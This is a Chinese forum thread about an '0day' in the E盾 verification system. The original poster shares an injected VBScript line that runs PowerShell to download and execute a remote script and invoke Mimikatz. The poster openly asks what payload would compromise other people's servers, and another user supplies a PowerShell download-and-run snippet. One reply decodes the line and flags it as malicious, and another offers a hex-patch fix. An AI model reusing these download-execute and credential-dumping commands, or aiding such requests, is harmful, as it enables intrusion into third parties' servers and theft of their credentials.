E盾0day的问题

最近找0day的时候发现了这行代码", "123456@qq.com", "", ""
Set obj = createobject("wscript.shell")
obj.run(unescape("cmd.exe%20%2Fc%20powershell%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A%2F%2F127.0.0.1%2F123.txt%27%29%3B%20Invoke-Mimikatz"))
MyMail.MailFromTo "

请问一下123.txt里面应该放什么内容，才能实现0day上服务器。

核心编码字符串解码后为：cmd.exe /c powershell IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/123.txt'); Invoke-Mimikatz；
代码功能是通过 VBScript 调用 cmd 执行 PowerShell，下载并执行远程脚本，同时调用 Mimikatz 提取系统凭据；
该代码属于高风险恶意脚本，非授权场景下使用 / 运行均违反安全规范。那要看对方服务器有什么漏洞，用的什么防火墙，什么杀毒！这得有很深的网络安全技术，或有直接扫漏洞GET Webshell的安全监测软件！

小飞飞象 发表于 2026-2-28 20:49
核心编码字符串解码后为：cmd.exe /c powershell IEX (New-Object Net.WebClient).DownloadString('http:// ...

怎么像是豆包回答的，昨天豆包搜了一下，回答的和这类似。我感觉这个是通过cmd调用，在服务器创建一个用户，但是试了好几种一直没成功。老师这有能用的脚本吗

樱花落满地 发表于 2026-3-2 18:21
怎么像是豆包回答的，昨天豆包搜了一下，回答的和这类似。我感觉这个是通过cmd调用，在服务器创 ...

去掉像，就是豆包回答的

修复方法
旧漏洞3 ＝ “777363726970742E657865”  ' wscript.exe
新修复3 ＝ 字节集转为16进制文本 (到字节集 (取随机字符 (7))) ＋ “2E657865”  ' .exe 此操作修复已知的0day偷家.原理为禁用邮箱调用wscript.exe此程序

用WINHEX搜索替换16进制字符串即可,只要长度一样就行.

wys810301 发表于 2026-3-5 17:25
修复方法
旧漏洞3 ＝ “777363726970742E657865”  ' wscript.exe
新修复3 ＝ 字节集转为16进制文本 (到字 ...

老师，你好像会错意了，我想问的是怎么0day别人的E盾Set obj = createobject("wscript.shell")
obj.run(unescape("cmd.exe%20%2Fc%20powershell%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A%2F%2F127.0.0.1%2F123.txt%27%29%3B%20Invoke-Mimikatz"))
MyMail.MailFromTo "
目前找到了这个代码，不知道123.txt里面放什么内容才能0day

wys810301 发表于 2026-3-5 17:25
修复方法
旧漏洞3 ＝ “777363726970742E657865”  ' wscript.exe
新修复3 ＝ 字节集转为16进制文本 (到字 ...

老师你好像会错意了，我想0day别人的验证

$client = new-object System.Net.WebClient
$client.DownloadFile('http://0.0.0.0:0000/xxx.exe', 'C:\Users\xxx.exe')
start C:\Users\xxx.exe

给HB吧

晨墨哥 发表于 2026-3-6 16:49
$client = new-object System.Net.WebClient
$client.DownloadFile('http://0.0.0.0:0000/xxx.exe', 'C:%us ...

                               
登录/注册后可看大图

不行啊老师，直接提示注册失败，请看一下是哪里没写对